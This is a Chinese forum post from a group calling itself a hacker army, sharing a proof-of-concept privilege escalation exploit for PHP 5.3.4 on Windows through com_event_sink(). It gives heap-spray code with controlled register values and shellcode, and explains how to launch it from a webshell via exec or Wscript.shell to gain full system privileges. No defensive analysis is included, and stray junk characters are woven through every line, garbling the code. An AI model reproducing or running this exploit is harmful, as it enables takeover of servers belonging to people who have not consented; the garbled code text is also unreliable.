|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中0 W7 Z1 T4 c- {! ^. o
& W2 E2 o2 _, n' @- m& e测试方法如下:cmd /c x:\php\php.exe x:\test.php
6 i F# g4 M9 t* g* C% U4 r) d' [! n0 G4 ~
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
) v7 ?- d7 f W ]- X" j. d这里是两个测试的截图:
' S4 K4 G$ r8 p% T
" z0 e* t3 E8 U8 ]: j
* C5 G" {0 f$ e1 x* K* f ^3 a6 }7 [- k8 M/ j# o- S
) T8 D- }3 A3 m: f: H( Z. _
1 S7 i! S: K, V* L成功利用此漏洞的攻击者将获得系统的最高权限- ]- {8 a5 C+ ]: B) [2 d! z) C
; s; Y# I0 K" P; a3 T) ^" }* k( Q1 g
# s+ x. |, ~! W! G- @: L
z I9 O4 [9 Z
- K. s- O0 D8 Y& J: q+ G8 x! [关于漏洞分析稍后附上。一下是PoC代码:
' _0 o7 T1 ~- ]3 f- ^ x- t' ?
) C! i$ p6 t) \+ v8 E. l<?php
3 c6 @3 n6 l9 h+ m" T/ q; w: r8 N//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
- V3 v9 y' L. R/ x//$eip ="\x44\x43\x42\x41";
: Y, u/ ]! L: S& n. {! d$eip= "\x4b\xe8\x57\x78";. v% |. l; q; L0 i
$eax ="\x80\x01\x8d\x04";
+ c4 }( G8 m& g3 H6 L9 _3 H$deodrant="";- a$ T" V$ @+ b+ R& Q4 B7 B4 z
$axespray = str_repeat($eip.$eax,0x80);3 c" ]$ p9 _0 X: ^- P1 r
//048d0190# B0 r. ]: Q. _+ g/ H0 p% w8 O) u
echo strlen($axespray);
" ~5 K9 \* j% {$ y" A" [1 secho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";; Y7 Y7 z: D7 }& ?
echo "Silic Group Hacker Army - BlackBap.Org";) \4 y8 R6 b- l: u
//19200 ==4B32 4b006 F) C# X S0 @7 V
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}0 y8 X3 Q, P" F' D% Y [
$terminate = "T";# {5 f: V% z3 |: B: @
$u[] =$deodrant;6 r3 D2 J" x7 p; E/ v
$r[] =$deodrant.$terminate;+ o9 O) k, a' }3 k; F" J
$a[] =$deodrant.$terminate;# H; k3 B% v/ [( p7 Q7 E
$s[] =$deodrant.$terminate;
% e6 l/ `8 [; ?//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
) K; J! [* H& j* v: X v$ \6 H$vVar = new VARIANT(0x048d0000+180);
0 S* ?; Y( y3 X9 X8 n//弹窗代码(Shellcode)0 _1 a; b; V* g/ G
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";. e+ h4 L3 t( {# K' w) j/ {3 v H
$var2 = new VARIANT(0x41414242);) x0 @ C3 o: x1 n# J( I$ k% C* `/ j, s/ L
com_event_sink($vVar,$var2,$buffer);
; S; d3 c/ W- @$ G7 Y?>
3 u( c, L2 H& j; T |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|